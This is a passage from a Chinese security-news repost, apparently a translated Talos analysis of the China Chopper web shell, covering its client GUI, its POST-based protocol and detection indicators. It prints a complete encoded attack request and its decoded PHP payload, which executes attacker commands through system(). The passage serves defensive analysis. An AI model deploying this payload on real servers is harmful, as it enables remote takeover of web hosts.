欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

九年后“中国菜刀”依然锋利:China Chopper三起攻击案例分析

来源:本站整理 作者:佚名 时间:2019-09-06 TAG: 我要投稿

过去发现的威胁常常会随着时间的推移而逐渐退出于公众视野中,但China Chopper却保持了长久的生命力。
在过去两年的时间里,思科Talos团队观察到China Chopper大量活动的踪迹,有数个威胁组织将China Chopper融入到其行动中,这表明,即使距China Chopper首次发现已经过了九年,对部分威胁行为者而言它却依然能起到关键的作用。本文将选择其中最活跃的三次行动来分析。
China Chopper是一种web shell,能让攻击者通过包含控制目标所需所有逻辑的客户端应用程序保留对受感染系统的访问权限。
China Chopper是广泛可用的,几乎任何人都可以使用它。这也意味着,仅以China Chopper的存在作为指标,几乎不可能将攻击归咎于某个特定群体。
China Chopper的“老当益壮”也间接说明了许多看似老旧威胁永远不会真正消失,互联网的防御者们不应当只把目光放到一些新的恶意软件上。
什么是China Chopper?
China Chopper是一类工具,允许攻击者远程控制目标系统,前提是系统需要运行web服务器应用程序。Web shell可以在不同的平台上运行,但在本例中,我们只关注受感染的Windows主机。China Chopper已被证实由一些国家支持的威胁团体,如Leviathan、Threat Group-3390等在使用。
在研究中我们发现,Internet Information Services (IIS)和Apache web服务器都受到过China Chopper web shell的攻击。我们没有关于web shell是如何安装的信息,但是考虑到有一些web应用程序框架,比如老版本的Oracle WebLogic或WordPress,它们当中包含的远程代码执行漏洞可能使自己成了攻击目标。
China Chopper为攻击者提供了一个简单的GUI,允许他们配置到服务器的链接,并生成服务器端代码,这些代码必须添加到目标网站的代码后才能进行通信。

图1.China Chopper GUI
服务器端代码非常简单,只包含一行代码,根据应用程序平台的不同有所改变。后门支持.NET Active Server Pages或PHP。
以下是受感染的PHP应用程序的服务器端代码示例:
我们并不能确定,服务器代码的如此简单是否是China Chopper开发人员为了增加检测的难度而故意为之,但是在短代码片段上使用模式匹配可能会产生一些误报。
China Chopper客户端使用HTTP POST请求与受感染的服务器通信。服务器端代码的唯一功能是评估在客户端GUI中配置服务器代码期间指定的请求参数。在我们的示例中,预期的参数名称是“test”。通过HTTP的通信,可以很容易在捕获网络数据包后发现。
China Chopper包含一个远程shell(虚拟终端)功能,它首先会建议使用命令 'netstat an|find "ESTABLISHED."',在受感染系统上的进程创建日志中很可能会看到此命令。

图2.China Chopper首先建议的终端命令
当我们分析捕获的数据包时,可以看到参数“test”包含另一个eval语句。
根据该命令,客户端将提交一定数量的参数,z0一直到zn。在提交之前,所有参数都使用标准base64编码器进行编码。参数z0始终包含解析其他参数、启动请求的命令并将结果返回给客户机的代码。
带参数的编码China Chopper POST请求:
test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D
在此请求中,解码的参数是:
z0 - @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|
命令的末尾“&echo [S]&cd&echo [E]”似乎出现在所有虚拟终端请求中,可以作为一个可靠的指示器来检测数据包捕获或行为日志中的China Chopper活动。
除了终端,China Chopper还包括一个文件管理器(能够创建目录、下载文件和更改文件元数据)、一个数据库管理器和一个基本的漏洞扫描器。
下面是我们对三次行动的论述,它们分别有不同的目标、工具、技术及(可能不同的)威胁团伙。

图3.观察到的案例研究的时间表
案例研究1:针对亚洲政府组织的间谍行动
我们在几次间谍活动中确定了China Chopper的使用情况,其中一次针对亚洲政府组织的行动中,China Chopper被用于内部网络,安装在了一些用于存储机密文档的Web服务器

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载